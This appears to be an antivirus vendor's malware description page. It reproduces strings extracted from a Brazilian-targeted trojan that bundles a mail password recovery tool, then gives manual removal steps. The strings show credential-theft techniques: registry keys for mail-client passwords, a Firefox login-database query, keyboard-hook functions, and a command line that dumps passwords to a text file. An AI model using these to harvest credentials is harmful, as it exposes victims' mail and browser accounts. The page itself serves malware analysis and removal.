KeyPreview<
WindowStatet
tagMSG
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
OnExecuteMacro
Service %s
Topic %s
OnActionExecutel
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %d %s %d %s %s
ftpTransfer
ftpReady
ftpAborted
ClientPortMinT
ClientPortMax
Port
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
saUsernamePassword
PasswordT
Port
0.0.0.1
TIdTCPConnection
TIdTCPConnection`
IdTCPConnection
EIdTCPConnectionError
TIdTCPClient
TIdTCPClient0
IdTCPClient
BoundPort
PortU
password
Password
IdHTTPHeaderInfo
ProxyPasswordT
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFile
OnGetPasswordh'G
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPResponsetqG
TIdHTTPRequest
TIdHTTPRequest,rG
TIdHTTPProtocol@sG
TIdCustomHTTP
TIdCustomHTTP@sG
TIdHTTP(uG
TIdHTTPptG
HTTPOptions
PortHeG
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
[email protected]
*.dbx
C:\Windows\winx.log
*.wab
*.mbx
*.mai
*.eml
*.tbb
*.mbox
1.2.3
Portable Network Graphics
c:\program files\borland\delphi7\Lib\AdvEdDD.pas
etPassword
TURLClickEvent
ShowURL
URLColor
PasswordChar
OnURLClick
COMCTL32.DLL
\EMBUTIR1.exe
cmd.exe /c "
EMBUTIR1.exe /stext
\senha.txt"
\winhelp32.txt
\h4714log.txt
\senha.txt
\autostart.bat
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
?456789:;<=
!"#$%&'()* ,-./0123
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
ole32.dll
shell32.dll
ShellExecuteA
9!9%9)9-919
: :$:(:,:0:4:8:<:
2%2 272>2
= =$=(=,=0=4=
8-858M8U8q8y8}8
6 6$6(6,6064686<6\6|6
515@5\5|5
3 3$3(3,3034383<3@3\3|3
2 2$282^2
1 1$1(1,1014181<1@1`1
!0%0)0-01080
5"5&5*5.52565
9.92969:9
5&545]5|5
<#<'< <0<;<?<[<
.text
`.rdata
@.data
.rsrc
t{SSh
v%SSW
Mail PassView
Mozilla\Profiles
Software\Mozilla\Mozilla Thunderbird
%s\Main
sqlite3.dll
nss3.dll
%programfiles%\Mozilla Thunderbird
AddExportHeaderLine
%s %s %s
HTTPMail User Name
SMTP USer Name
HTTPMail Server
SMTP Server
POP3 Password2
IMAP Password2
HTTPMail Password2
SMTP Password2
POP3 Port
IMAP Port
HTTPMail Port
SMTP Port
HTTPMail Secure Connection
SMTP Secure Connection
SMTP Display Name
SMTP Email Address
POP3 Password
IMAP Password
HTTP Password
SMTP Password
HTTP User
SMTP User
HTTP Server URL
HTTP Port
HTTPMail Use SSL
SMTP Use SSL
%s\%s
PopPort
PopPassword
SMTPAccount
SMTPServer
SMTPPort
SMTPLogSecure
SMTPPassword
%s\Accounts
LoginName
SavePasswordText
ESMTPUsername
ESMTPPassword
POP3Password
fb.dat
%[email protected]
%[email protected]
"Account","Login Name","Password","Web Site","Comments"
Software\Microsoft\Windows Messaging Subsystem\Profiles
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
<meta http-equiv='content-type' content='text/html;charset=%s'>
<br><h4>%s <a href="hXXp://VVV.nirsoft.net/" target="newwin">%s</a></h4><p>
smtp
*.ini
netmsg.dll
Error %d: %s
menu_%d
dialog_%d
TranslatorURL
_lng.ini
%-18s: %s
%%-%d.%ds
<td bgcolor=#%s nowrap>%s
<td bgcolor=#%s>%s
<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
bgcolor="%s"
<font color="%s">%s</font>
<%s>%s</%s>
</%s>
report.html
*.txt
*.htm;*.html
*.xml
*.csv
Software\NirSoft\MailPassView
MailPassView
/skeepass
/deleteregkey
Failed to load the executable file !
mail.account.account
mail.server
port
mail.identity
signon.signonfilename
mailbox://%s@%s
imap://%s@%s
SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins
mailbox://%s
imap://%s
smtp://%s
signons.txt
signons.sqlite
prefs.js
Password.NET Messenger Service
User.NET Messenger Service
Passport.Net\*
ps:password
windowslive:name=
Exception %8.8X at address %8.8X in module %s
Stack Data: %s
Code Data: %s
mozsqlite3.dll
PK11_GetInternalKeySlot
PK11_CheckUserPassword
psapi.dll
pstorec.dll
5e7e8100-9138-11d1-945a-00c04fc308ff
00000000-0000-0000-0000-000000000000
220D5CD0-853A-11D0-84BC-00C04FD43F8F
220D5CD1-853A-11D0-84BC-00C04FD43F8F
220D5CC1-853A-11D0-84BC-00C04FD43F8F
417E2D75-84BD-11D0-84BB-00C04FD43F8F
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
shlwapi.dll
<html><head>%s<title>%s</title></head>
%s <h3>%s</h3>
size="%d"
color="#%s"
<font color="%s">
<table border="1" cellpadding="5"><tr%s>
width="%s"
<th%s>%s%s%s
SOFTWARE\Mozilla
mozilla
%s\bin
PathToExe
\sqlite3.dll
\mozsqlite3.dll
sqlite3_open
sqlite3_prepare
sqlite3_step
sqlite3_column_text
sqlite3_column_int
sqlite3_column_int64
sqlite3_finalize
sqlite3_close
sqlite3_exec
Software\Microsoft\Windows Mail
Software\Microsoft\Windows Live Mail
SMTP_Server
SMTP_User_Name
POP3_Password2
IMAP_Password2
NNTP_Password2
SMTP_Password2
SMTP_Email_Address
SMTP_Port
NNTP_Port
IMAP_Port
POP3_Port
SMTP_Secure_Connection
*.oeaccount
\Microsoft\Windows Mail
\Microsoft\Windows Live Mail
f:\Projects\VS2005\mailpv\Release\mailpv.pdb
msvcrt.dll
_acmdln
COMCTL32.dll
RPCRT4.dll
GetWindowsDirectoryA
KERNEL32.dll
EnumChildWindows
USER32.dll
GDI32.dll
comdlg32.dll
RegDeleteKeyA
RegEnumKeyA
RegEnumKeyExA
ADVAPI32.dll
SHELL32.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="NirSoft" type="win32"></assemblyIdentity><description>NirSoft</description><dependency><dependentAssembly><assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency></assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING`
hXXp://VVV.usertrust.com1
3hXXp://crl.usertrust.com/AddTrustExternalCARoot.crl05
hXXp://ocsp.usertrust.com0
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl05
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl0t
1hXXp://crt.usertrust.com/UTNAddTrustObject_CA.crt0%
hXXps://secure.comodo.net/CPS0A
0hXXp://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
0hXXp://crt.comodoca.com/COMODOCodeSigningCA2.crt0$
hXXp://ocsp.comodoca.com0
[email protected]
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
UrlMon
0IdHTTPHeaderInfo
 IdTCPServer
IdTCPStream
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
Login
Picture.Data
-gGrgZ9}
Icon.Data
33333333333333333
%#%#%#%#%#%#%#%#%#%#%
.FoO'Z
%cj@3
ib&%s
.UNk%#r
 D.BCn
haz$.kI
tNG%s3
H.dKe
"j4W%u
is.Qfe
.dci,
PM%0x
ZX.kG
%s js \HB
=.FmK
X.Hl^2
.VY2U
%S>VV
3V.Kb
l%SFW[
6,%U@
RY.yAo2
uFÏ
.cJotqYm
L.bfQ
)b2Í
LabelFont.Charset
LabelFont.Color
LabelFont.Height
LabelFont.Name
LabelFont.Style
Lookup.Separator
2.9.1.4
G%sXj~z
%SSXt
.xak[`9
.mUIWJH
GN .SA
~cBMmSg'cemv
Equipe do Outlook.com
TIdHTTP
ProxyParams.BasicAuthentication
ProxyParams.ProxyPort
Request.ContentLength
Request.ContentRangeEnd
Request.ContentRangeStart
Request.ContentType
Request.Accept
Request.BasicAuthentication
Request.UserAgent
&Mozilla/3.0 (compatible; Indy Library)
VVV.google.com/Please log in to your Gmail account
VVV.google.com:443/Please log in to your Gmail account
VVV.google.com/Please log in to your Google Account
VVV.google.com:443/Please log in to your Google Account
VVV.google.com
dWindowsLive:name=*
abe2869f-9b47-4cd9-a358-c22904dba7f7
82BD0E67-9FEA-4748-8672-D5EFE5B779B0
Copy Password
&HTML Report - All Items
HTML R&eport - Selected Items
HTML Report - All Items
HTML Report - Selected Items
%d items
, %d Selected
Select Eudora.ini filename/Select the location of Thunderbird installation
Loading... %d
KeePass csv file
Eudora.ini file
SMTP
Windows Mail
Windows Live Mail
Server Port
Password Strength
SMTP Server Port
Mail Password Recovery
Mail PassView
This "Portable Network Graphics" image is not supported because either it's width or height exceeds the maximum size, which is 65535 pixels length.
There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.cThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.jThis "Portable Network Graphics" image is invalid because the decoder found an unexpected end of the file.8This "Portable Network Graphics" image contains no data.oSome operation could not be performed because the system is out of resources. Close some windows and try again.OThis operation is not valid because the current image contains no valid header.4The new size provided for image resizing is invalid.
SSL status: "%s"
Host field is emptyjThis "Portable Network Graphics" image is not valid because it contains invalid pieces of data (crc error)yThe "Portable Network Graphics" image could not be loaded because one of its main piece of data (ihdr) might be corruptedUThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data.
Description: BThe "Portable Network Graphics" image contains an invalid palette.
The file being readed is not a valid "Portable Network Graphics" image because it contains an invalid header. This file may be corruped, try obtaining it again.nThis "Portable Network Graphics" image is not supported or it might be invalid.
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
.Cannot send or receive after socket is closed.#Too many references, cannot splice.
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
DThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
No help keyword specified.
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
File "%s" not found1Only one TIdAntiFreeze can exist per application.
8Listbox (%s) style must be virtual in order to set Count"Unable to find a Table of Contents
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Invalid clipboard format Clipboard does not support Icons
Text exceeds memo capacity/Menu '%s' is already being used by another form
Error setting %s.Count
Cannot drag a form"An error returned from DDE ($0%x)/DDE Error - conversation not established ($0%x)0Error occurred when DDE ran out of memory ($0%x)"Unable to connect DDE conversation
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Unsupported clipboard format
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to create key %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Unable to write to %s
Invalid stream format$''%s'' is not a valid component name
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
1.5.4.3
1.0.0.0


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    net1.exe:2028
    net.exe:420
    mscorsvw.exe:1912
    %original file name%.exe:472

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Application Data\EMBUTIR1.exe (105 bytes)
    %Documents and Settings%\%current user%\Application Data\AvastK.exe (16954 bytes)
    %Documents and Settings%\%current user%\Application Data\AvastV.exe (54343 bytes)
    %Documents and Settings%\%current user%\Application Data\mip.dat (38 bytes)
    %Documents and Settings%\%current user%\Application Data\idpc.d (9 bytes)
    %Documents and Settings%\%current user%\Application Data\icone.cur (326 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "DesktopU" = "%Documents and Settings%\%current user%\Application Data\AvastV.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now